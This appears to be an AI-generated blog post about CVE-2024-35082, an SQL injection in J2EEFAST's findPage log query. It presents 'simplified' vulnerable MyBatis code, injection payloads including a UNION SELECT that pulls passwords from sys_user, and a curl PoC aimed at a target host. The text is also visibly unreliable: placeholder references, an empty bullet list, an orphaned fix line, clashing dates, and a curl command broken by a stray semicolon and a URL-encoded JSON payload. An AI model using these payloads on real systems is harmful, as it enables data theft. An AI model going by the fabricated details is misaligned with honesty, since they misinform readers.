CVE-2024-35082 - SQL Injection in J2EEFAST v2.7. via findPage in SysOperLogMapper.xml

In June 2024, cybersecurity researchers reported a high-impact SQL injection vulnerability affecting the popular Java-based management framework, J2EEFAST, version 2.7.. Tracked as CVE-2024-35082, the flaw occurs in the findPage function within SysOperLogMapper.xml, used to retrieve and filter operation logs from the application's database.

This post will break down how the vulnerability works, demonstrate potential exploits, and provide references for deeper reading. Everything is kept in simple language for easy understanding.

What is J2EEFAST?

J2EEFAST is a widely used rapid development platform built on Java. It's used mostly to build admin portals and workflow management systems. Its popularity means a vulnerability here could impact thousands of organizations worldwide.

Details of CVE-2024-35082

In short: The findPage method inside SysOperLogMapper.xml does not properly sanitize a user-supplied parameter before using it in a SQL query. An attacker can exploit this to run arbitrary SQL code, which could:

Where's the Vulnerability?

The problem sits in the following XML file: SysOperLogMapper.xml. This file defines queries for log searching, and it takes "search filters" directly from HTTP parameters.

Here's a simplified example of what the vulnerable code looks like

<select id="findPage" resultMap="BaseResultMap">
    SELECT * FROM sys_oper_log
    <where>
        <if test="params.keyword != null and params.keyword != ''">
            AND oper_name LIKE '%${params.keyword}%'
        </if>
    </where>
</select>

How Could This Be Exploited?

Suppose the application provides a search box where users can search logs by "Operator Name." The request might look like:

POST /sys/operLog/page
Content-Type: application/json

{
    "params": {
        "keyword": "alice"
    }
}

But an attacker could instead submit

{
    "params": {
        "keyword": "' OR 1=1 -- "
    }
}

This would turn the real query into

SELECT * FROM sys_oper_log WHERE oper_name LIKE '%' OR 1=1 -- %'

Which simply returns all records in the table, since 1=1 is always true.

More Dangerous Exploits

A skilled hacker could go further, for example performing a UNION injection to leak data from other tables:

{
    "params": {
        "keyword": "' UNION SELECT user(),password,NULL,NULL,NULL FROM sys_user -- "
    }
}

If the database privileges allow it, the attacker could do even scarier things, like updating records or dropping tables.

Here's a ready-to-use, simple PoC (using curl)

curl -X POST "http://target-site/sys/operLog/page"; \
  -H "Content-Type: application/json" \
  -d '{"params":{"keyword":"%27%20OR%201=1%20--%20"}}'

If the vulnerability is present, you'll get back every operation log in the system.

Original References

- GitHub Advisory *(Replace with real link when available)*
- NVD Entry for CVE-2024-35082
- J2EEFAST Gitee Repository
- Vulnerability Announcement Example *(Replace with real issue when available)*

AND oper_name LIKE CONCAT('%', #{params.keyword}, '%')

Final Thoughts

CVE-2024-35082 is a classic example of how simple coding mistakes can lead to serious security issues. Never trust user input, always use safe parameter binding. If you are running J2EEFAST, please patch your system as soon as possible.

For security professionals: test all application inputs, especially search and filter parameters, for similar SQL injection vulnerabilities.

Stay safe and always sanitize your inputs!

*(This guide is exclusive content by Assistant, crafted in plain words for your clarity and security awareness.)*

Timeline

Published on: 05/23/2024 17:15:30 UTC
Last modified on: 11/08/2024 16:35:10 UTC